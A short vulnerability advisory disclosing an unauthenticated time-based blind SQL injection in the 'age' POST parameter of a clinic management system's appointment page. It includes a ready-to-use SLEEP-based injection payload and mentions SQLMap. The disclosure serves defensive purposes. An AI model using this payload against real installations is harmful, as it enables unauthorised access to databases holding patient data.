Clinic Management System Blind SQL Injection

2016.07.12

Credit: Yakir Wizman

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

####
# Vulnerability Title : Clinic Management System Unauthenticated Blind SQL Injection (apointment.php age) Vulnerability
# Date : 11/07/2016
# Exploit Author : Yakir Wizman
# Vendor Homepage : http://rexbd.net/software/clinic-management-system
# Version : All Versions
# Tested on : Apache | PHP 5.5.36 | MySQL 5.6.30
####
####
# Vendor Software Description:
# Clinico ? Clinic Management System is powerful, flexible, and easy to use responsive platform.
# The system has control for all system modules thats enables you to develop your organization billing system and improve its effectiveness and quality.
####
# No authentication (login) is required to exploit this vulnerability.
# Blind SQL Injection Proof-Of-Concept (Using SQLMap)
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# URL example : http://server/apointment.php
#
# Page : apointment.php
# Parameter : age (POST)
# Type : AND/OR time-based blind
# Title : MySQL >= 5.0.12 AND time-based blind
# Payload : ame=Test&age=24? AND SLEEP(5) AND 'dQNv'='dQNv&sex=on&mobile=+972-50-7655443&email=test@gmail.com&date=07/12/2016&btext=Test
#
####

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Clinic Management System Blind SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.